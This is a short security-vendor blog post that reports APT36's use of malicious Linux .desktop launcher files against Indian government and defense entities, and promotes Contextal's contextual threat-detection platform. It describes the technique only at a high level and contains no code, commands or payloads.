Skip to main content
22 August 2025

APT36’s Shortcut to Government Systems

APT36’s Shortcut to Government Systems

Shortcuts as Hidden Weapons

Attackers love abusing shortcuts. Not long ago we wrote about malicious LNK files used against Thai officials and how Contextal was able to proactively stop that threat. Windows users know LNKs well as those seemingly harmless desktop icons that can actually execute hidden commands.

Same Trick - Different OS

Now the same playbook shows up on Linux. The threat actor group APT36 has been distributing malicious .desktop files in a campaign targeting Indian government and defense entities. Normally just simple launchers, here they're turned into loaders that pull in and execute malware. Different platform, same trick – abuse what looks like something perfectly legitimate.

Why This Matters in India

It's worth noting that Linux is widely adopted across India's public sector, with government-endorsed distributions like BOSS and Maya OS already deployed in ministries, defense, and education. That makes the discussed attack a very real threat vector in this region.

Contextal’s Proactive Defense

To protect against such threats Contextal doesn't just scan extensions or file types in isolation. We analyze the full context - where the file came from, what it contains, what it tries to do, and how it connects to an attack chain. That's how we block threats proactively, before they cause damage.

Deploy Contextal Platform or MailPhence today and stay a step ahead.

Live Demo

See Contextal Platform in action. Book a live demo with our team and experience the most advanced contextual detection system.